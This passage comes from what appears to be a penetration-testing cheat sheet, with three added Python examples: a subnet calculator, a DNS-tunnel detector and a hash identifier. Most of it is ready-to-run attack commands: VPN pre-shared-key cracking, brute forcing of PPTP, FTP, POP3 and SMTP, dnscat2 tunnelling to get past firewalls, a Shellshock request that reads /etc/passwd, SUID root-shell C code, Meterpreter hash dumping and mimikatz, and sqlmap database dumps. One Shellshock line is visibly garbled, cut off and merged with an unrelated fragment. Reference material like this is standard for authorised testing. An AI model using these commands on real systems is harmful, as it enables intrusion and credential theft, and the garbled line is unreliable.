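The ipcalc commands in the Pre-engagement section and the subnet table above, reproduced as an added Python example (written for this page, not from the original). subnet_row derives the mask and usable host count for any prefix length from the standard-library ipaddress module, so you can regenerate or check any row of the table rather than trusting a typed value, and cidr_summary does what ipcalc prints for a host address. One assumption of this code: /31 is counted as 2 usable hosts, following the RFC 3021 point-to-point convention, whereas the table above lists 1.

```python
import ipaddress


def subnet_row(prefix: int) -> tuple:
    """Return (dotted mask, usable hosts) for an IPv4 prefix length."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix must be 0..32")
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    if prefix == 32:
        usable = 1  # a single host route
    elif prefix == 31:
        usable = 2  # RFC 3021 point-to-point link: no network/broadcast reserved
    else:
        usable = net.num_addresses - 2  # drop the network and broadcast addresses
    return str(net.netmask), usable


def subnet_table(low: int = 8, high: int = 31) -> list:
    """Rows from /high down to /low, in the same order as the cheat sheet."""
    return [(f"/{p}",) + subnet_row(p) for p in range(high, low - 1, -1)]


def cidr_summary(cidr: str) -> dict:
    """ipcalc-style breakdown of a host address written as a.b.c.d/prefix."""
    iface = ipaddress.ip_interface(cidr)
    net = iface.network
    # Compute the host range arithmetically; enumerating hosts() on a /8 would be 16M entries.
    if net.prefixlen >= 31:
        first, last = net.network_address, net.broadcast_address
    else:
        first, last = net.network_address + 1, net.broadcast_address - 1
    return {
        "address": str(iface.ip),
        "network": str(net.network_address),
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "first_host": str(first),
        "last_host": str(last),
        "usable_hosts": subnet_row(net.prefixlen)[1],
        "is_private": net.is_private,
    }


if __name__ == "__main__":
    print(f"{'CIDR':<6}{'MASK':<18}HOSTS")
    for cidr, mask, hosts in subnet_table():
        print(f"{cidr:<6}{mask:<18}{hosts}")
    print(cidr_summary("192.168.1.77/24"))
```

The is_private flag is a quick way to confirm that an address you were handed for an internal engagement really falls inside the RFC 1918 ranges listed above before you start scanning it.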

VLAN Hopping:
Using NCC Group's VLAN hopping wrapper script for Yersinia simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh

VPN Pentesting Tools:
Identify VPN servers:
./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce:
Use IKEForce to enumerate or dictionary attack VPN servers.

Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking:
1 Identify VPN Servers
2 Enumerate with IKEForce to obtain the group ID
3 Use ike-scan to capture the PSK hash from the IKE endpoint
4 Use psk-crack to crack the hash

Step 1: Identify IKE Servers
./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt

Some more advanced psk-crack options below:

psk-crack:
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking:
Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:
nmap -Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack:
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst TARGET-IP

DNS Tunneling:
Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine:

Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:
Client downloads: https://downloads.skullsecurity.org/dnscat2/ and the PowerShell client https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host
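From the defender's side, tunnelling of this kind is visible in the resolver logs: dnscat2 carries its data in the query names themselves, so a session appears as a burst of distinct, long, high-entropy labels under a single base domain, often for TXT, CNAME or MX records rather than A/AAAA. The following Python is an added example that is not from the page or the dnscat2 project; the log format, the client addresses and the base domain tunnel-example.net are constructed for the demonstration, and the last-two-labels rule for the base domain is a simplification of what a real deployment would do with the Public Suffix List:

```python
import math
import re
from collections import Counter, defaultdict

# Added example (constructed, not from the original page): flag base domains
# whose query names look like a DNS tunnel rather than normal name lookups.

# Constructed query log in a hypothetical "timestamp client rtype qname"
# layout. The tunnel-like names use 32-hex-char labels under the
# placeholder domain tunnel-example.net.
SAMPLE_LOG = """\
2020-03-31T10:00:01Z 10.0.0.5 A www.example.com
2020-03-31T10:00:02Z 10.0.0.5 A mail.example.com
2020-03-31T10:00:03Z 10.0.0.7 AAAA cdn.example.org
2020-03-31T10:00:04Z 10.0.0.9 TXT 00112233445566778899aabbccddeeff.t.tunnel-example.net
2020-03-31T10:00:04Z 10.0.0.9 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.t.tunnel-example.net
2020-03-31T10:00:05Z 10.0.0.9 TXT ffeeddccbbaa99887766554433221100.t.tunnel-example.net
2020-03-31T10:00:05Z 10.0.0.9 TXT 1032547698badcfe1032547698badcfe.t.tunnel-example.net
2020-03-31T10:00:06Z 10.0.0.9 CNAME a1b2c3d4e5f60718293a4b5c6d7e8f90.t.tunnel-example.net
2020-03-31T10:00:06Z 10.0.0.9 MX 0a1b2c3d4e5f60718293a4b5c6d7e8f9.t.tunnel-example.net
2020-03-31T10:00:07Z 10.0.0.5 A www.example.com
"""

_LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character of a label (0.0 for an empty label)."""
    if not label:
        return 0.0
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in Counter(label).values())


def base_domain(qname: str) -> str:
    """Naive registrable domain: the last two labels of the name."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, rtype, qname = m.groups()
    return {"ts": ts, "client": client, "rtype": rtype,
            "qname": qname.lower().rstrip(".")}


def find_tunnel_candidates(log_text: str, min_distinct: int = 5,
                           min_label_len: int = 24, min_entropy: float = 3.5):
    """Return {base_domain: stats} for domains whose distinct query names
    are numerous, long and high-entropy at the leftmost label."""
    names_by_base = defaultdict(set)
    rtypes_by_base = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        base = base_domain(rec["qname"])
        names_by_base[base].add(rec["qname"])
        rtypes_by_base[base][rec["rtype"]] += 1

    flagged = {}
    for base, names in names_by_base.items():
        if len(names) < min_distinct:
            continue  # too few distinct names to carry a data stream
        leftmost = [n.split(".")[0] for n in names]
        mean_len = sum(len(l) for l in leftmost) / len(leftmost)
        mean_ent = sum(shannon_entropy(l) for l in leftmost) / len(leftmost)
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            flagged[base] = {
                "distinct_names": len(names),
                "mean_label_len": mean_len,
                "mean_entropy": mean_ent,
                "record_types": dict(rtypes_by_base[base]),
            }
    return flagged


if __name__ == "__main__":
    for base, stats in find_tunnel_candidates(SAMPLE_LOG).items():
        print(base, stats)
```

The record-type counts are reported rather than used as a gate because legitimate services also query TXT and MX; the distinct-name count, label length and entropy together are what separate a tunnel from ordinary lookups, and the thresholds are starting points to tune against your own resolver's baseline.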

BOF / Exploit:
Exploit Research:
Find exploits for enumerated hosts / services.

COMMAND DESCRIPTION:
Search exploit-db for exploit, in this example windows 2003 + local esc.
searchsploit windows 2003 | grep -i local

Use google to search exploit-db.com for exploits
site:exploit-db.com exploit kernel <= 3

Search metasploit modules using grep - msf search sucks a bit.
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*

Searching for Exploits:
Install / update the local copy of exploit-db:
searchsploit -u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali:
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
(select mingw32-base in the installer)
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Cross Compiling Exploits:
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities:
Exploiting Shellshock:
A tool to find and exploit servers vulnerable to Shellshock:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file (view file contents):
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $( 80, :DocumentRoot => Dir.pwd).start"

Run a basic PHP http server
php -S 0.0.0.0:80

Mounting File Shares:
How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION
Mount NFS share to /mnt/nfs.
mount 192.168.1.1:/vol/share /mnt/nfs

Mount Windows CIFS / SMB share on Linux at /mnt/cifs. If you omit password= it will prompt on the CLI (more secure, as the password won't end up in bash_history).
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs

Mount a Windows share on Windows from the command line.
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no

Install smb4k on Kali, useful Linux GUI for browsing SMB shares.
apt-get install smb4k -y

HTTP / HTTPS Web server Enumeration:
COMMAND DESCRIPTION:
Perform a nikto scan against target.
nikto -h 192.168.1.1

Configure via GUI, CLI input doesn’t work most of the time.
dirbuster

Packet Inspection:
COMMAND DESCRIPTION:
tcpdump for port 80 on interface eth0, outputs to output.pcap
tcpdump tcp port 80 -w output.pcap -i eth0

Username Enumeration:
Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration:
COMMAND DESCRIPTION:
Enumerate users from SMB.
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

RID cycle SMB / enumerate users from SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

SNMP User Enumeration:
COMMAND DESCRIPTION:
Enumerate users from SNMP.
snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4

Enumerate users from SNMP.
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX

Search for SNMP servers with nmap, grepable output.
nmap -sT -p 161 192.168.X.XXX/24 -oG snmp_results.txt
(then grep)

Passwords:
Wordlists:
COMMAND DESCRIPTION:
Kali wordlists.
/usr/share/wordlists

Brute Forcing Services:
Hydra FTP Brute Force:
COMMAND DESCRIPTION:
Hydra FTP brute force.
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V

Hydra POP3 Brute Force:
COMMAND DESCRIPTION:
Hydra POP3 brute force.
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V

Hydra SMTP Brute Force:
COMMAND DESCRIPTION:
Hydra SMTP brute force.
hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V

Use -t to limit concurrent connections, example: -t 15

Password Cracking:
Password cracking penetration testing tools.

John The Ripper – JTR:
COMMAND DESCRIPTION:
JTR password cracking.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes

JTR forced descrypt cracking with a wordlist.
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt brute force cracking.
john --format=descrypt hash --show

Windows Penetration Testing Commands:
See Windows Penetration Testing Commands.

Linux Penetration Testing Commands
See Linux Commands Cheat Sheet in another post for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits
Some notes on compiling exploits.

Identifying if C code is for Windows or Linux:
C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION:
Windows exploit code.
process.h, string.h, winbase.h, windows.h, winsock2.h

Linux exploit code.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/socket.h, sys/types.h, unistd.h

Build Exploit GCC:
Compile exploit gcc.

COMMAND DESCRIPTION:
Basic GCC compile.
gcc -o exploit exploit.c

GCC Compile 32Bit Exploit on 64Bit Kali:
Handy for cross-compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION:
Cross compile 32 bit binary on 64 bit Linux
gcc -m32 exploit.c -o exploit

Compile Windows .exe on Linux:
Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION:
Compile windows .exe on Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

SUID Binary:
Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

Below are some quick copy-and-paste examples for various shells:

SUID C Shell for /bin/bash:

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void){
setresuid(0, 0, 0); /* set real, effective and saved UID to root */
system("/bin/bash");
}

SUID C Shell for /bin/sh:
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}

Building the SUID Shell binary:
gcc -o suid suid.c

For 32 bit:
gcc -m32 -o suid suid.c

Reverse Shells:
See Reverse Shell Cheat Sheet in another post for a list of useful Reverse Shells.

TTY Shells:
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick:
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell:
/bin/sh -i

Spawn Perl TTY Shell:
exec "/bin/sh";
perl -e 'exec "/bin/sh";'

Spawn Ruby TTY Shell:
exec "/bin/sh"

Spawn Lua TTY Shell:
os.execute('/bin/sh')

Spawn TTY Shell from Vi:
Run shell commands from vi:
:!bash

Spawn TTY Shell NMAP:
!sh

Metasploit Cheat Sheet:
A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads:
Windows reverse meterpreter payload:
COMMAND DESCRIPTION:
Windows reverse tcp payload.
set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Windows VNC Payload.
set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Linux Reverse Payload.
set payload linux/meterpreter/reverse_tcp

Meterpreter Cheat Sheet:
Useful meterpreter commands.

COMMAND DESCRIPTION:
Meterpreter upload file to Windows target.
upload file c:\windows

Meterpreter download file from Windows target.
download c:\windows\repair\sam /tmp

Meterpreter run .exe on target – handy for executing uploaded exploits.
execute -f c:\windows\temp\exploit.exe

Creates new channel with cmd shell.
execute -f cmd -c

Meterpreter show processes.
ps

Meterpreter get shell on the target.
shell

Meterpreter attempts privilege escalation on the target.
getsystem

Meterpreter attempts to dump the hashes on the target.
hashdump

Meterpreter create port forward to target machine.
portfwd add -l 3389 -p 3389 -r target

Meterpreter delete port forward.
portfwd delete -l 3389 -p 3389 -r target

Common Metasploit Modules:
Top metasploit modules.

Remote Windows Metasploit Modules (exploits)
COMMAND DESCRIPTION:
MS08_067 Windows 2k, XP, 2003 Remote Exploit.
use exploit/windows/smb/ms08_067_netapi

MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit.
use exploit/windows/dcerpc/ms06_040_netapi

MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit.
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Local Windows Metasploit Modules (exploits):
COMMAND DESCRIPTION:
Bypass UAC on Windows 7 + Set target + arch, x86/64
use exploit/windows/local/bypassuac

Auxiliary Metasploit Modules:
COMMAND DESCRIPTION:
Metasploit HTTP directory scanner.
use auxiliary/scanner/http/dir_scanner

Metasploit JBOSS vulnerability scanner.
use auxiliary/scanner/http/jboss_vulnscan

Metasploit MSSQL Credential Scanner.
use auxiliary/scanner/mssql/mssql_login

Metasploit MySQL Version Scanner.
use auxiliary/scanner/mysql/mysql_version

Metasploit Oracle Login Module.
use auxiliary/scanner/oracle/oracle_login

Metasploit Powershell Modules:
COMMAND DESCRIPTION:
Metasploit powershell payload delivery module.
use exploit/multi/script/web_delivery

Metasploit upload and run powershell script through a session.
use post/windows/manage/powershell/exec_powershell

Metasploit JBOSS deploy.
use exploit/multi/http/jboss_maindeployer

Metasploit MSSQL payload.
use exploit/windows/mssql/mssql_payload

Post Exploit Windows Metasploit Modules:
Windows Metasploit Modules for privilege escalation.

COMMAND DESCRIPTION:
Metasploit show privileges of current user.
run post/windows/gather/win_privs

Metasploit grab GPP saved passwords.
use post/windows/gather/credentials/gpp

Metasploit load Mimikatz.
load mimikatz, then wdigest

Identify other machines that the supplied domain user has administrative access to.
run post/windows/gather/local_admin_search_enum

Automated dumping of sam file, tries to esc privileges etc.
run post/windows/gather/smart_hashdump

ASCII Table Cheat Sheet:
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER
x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x22 "
x23 #
x24 $
x25 %
x26 &
x27 '
x28 (
x29 )
x2a *
x2b +
x2c ,
x2d -
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

CISCO IOS Commands:
A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION:
Enters enable mode.
enable

Short for, configure terminal.
conf t

Configure FastEthernet 0/0.
(config)# interface fa0/0

Add ip to fa0/0.
(config-if)# ip addr 0.0.0.0 255.255.255.255

Configure vty line.
(config-if)# line vty 0 4

Cisco set telnet password.
(config-line)# login

Set telnet password
(config-line)# password YOUR-PASSWORD

Show running-config loaded in memory.
# show running-config

Show startup-config.
# show startup-config

Show Cisco IOS version.
# show version

Display open sessions.
# show session

Show network interfaces.
# show ip interface

Show detailed interface info.
# show interface e0

Show routes.
# show ip route

Show access-lists.
# show access-lists

Show available files.
# dir file systems

File information.
# dir all-filesystems

Show deleted files.
# dir /all

No limit on terminal output.
# terminal length 0

Copies running-config to tftp server.
# copy running-config tftp

Copy running-config to startup-config (save the running configuration).
# copy running-config startup-config

Cryptography:
Hash Lengths:
HASH SIZE
MD5 Hash Length 16 Bytes

SHA-1 Hash Length 20 Bytes

SHA-256 Hash Length 32 Bytes

SHA-512 Hash Length 64 Bytes

Hash Examples:
Likely just use hash-identifier for this but here are some example hashes:

HASH EXAMPLE
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a
NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b
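The hash-identifier approach the section refers to is essentially classification by hex length, with the important caveat visible in the table above: an MD5 digest and an NTLM hash are both 32 hex characters, so length alone cannot tell them apart. The following Python is an added example, not the page's own tooling or the hash-identifier project's code: it classifies a digest by length, splits the hashcat-style digest:salt entries shown above, and confirms a guess by recomputing the unsalted digest of a known test string. The unsalted examples above are hashcat's published test vectors, which all hash the string "hashcat"; that is the basis of the confirmation step.

```python
import hashlib
from typing import Dict, List, Optional, Tuple

# Added example (not from the original page): a minimal hash identifier in
# the spirit of the hash-identifier tool, plus a confirmation step.

# Hex length -> candidate algorithms. 32 hex chars is ambiguous: MD5 and
# NTLM (MD4 over the UTF-16LE password) have the same length, so both are
# returned rather than guessing one.
_BY_HEX_LEN: Dict[int, List[str]] = {
    32: ["MD5", "NTLM"],
    40: ["SHA-1"],
    64: ["SHA-256"],
    128: ["SHA-512"],
}

# Algorithms hashlib can recompute portably. NTLM needs MD4, which hashlib
# cannot provide on OpenSSL 3 systems without the legacy provider, so it is
# identified by length only.
_HASHLIB_NAMES = {"MD5": "md5", "SHA-1": "sha1",
                  "SHA-256": "sha256", "SHA-512": "sha512"}


def split_hash_salt(entry: str) -> Tuple[str, Optional[str]]:
    """Split a 'digest:salt' entry ($PASS:$SALT / $SALT:$PASS layouts above)."""
    digest, sep, salt = entry.strip().partition(":")
    return digest.lower(), (salt if sep else None)


def identify(entry: str) -> List[str]:
    """Candidate algorithms for a hex digest; [] if it is not a known shape."""
    digest, _ = split_hash_salt(entry)
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return []
    return list(_BY_HEX_LEN.get(len(digest), []))


def confirm(entry: str, known_input: str) -> Optional[str]:
    """Return the candidate whose digest of known_input equals the entry.

    Only unsalted digests are checked: for the salted layouts the salt
    order ($PASS:$SALT vs $SALT:$PASS) would also have to be tried.
    """
    digest, salt = split_hash_salt(entry)
    if salt is not None:
        return None
    for algo in identify(entry):
        name = _HASHLIB_NAMES.get(algo)
        if name and hashlib.new(name, known_input.encode()).hexdigest() == digest:
            return algo
    return None


if __name__ == "__main__":
    for h in ("8743b52063cd84097a65d1633f5c74f5",
              "b89eaac7e61417341b710b727768294d0e6a277b",
              "b4b9b02e6f09a9bd760f388b67351e2b"):
        print(h, identify(h), confirm(h, "hashcat"))
```

For the NTLM example the identifier returns both MD5 and NTLM and the confirmation step returns None, which is the honest answer: MD5 of "hashcat" does not match, and the code does not compute MD4, so the remaining candidate is unconfirmed rather than asserted.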

SQLMap Examples:
A mini SQLMap cheat sheet:

COMMAND DESCRIPTION:
Automated sqlmap scan.
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

Targeted sqlmap scan.
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"

Scan url for union + error based injection with mysql backend and use a random user-agent + database dump.
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump

sqlmap check form for injection.
sqlmap -o -u "http://meh.com/form/" --forms

sqlmap dump and crack hashes for table users on database-name.
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump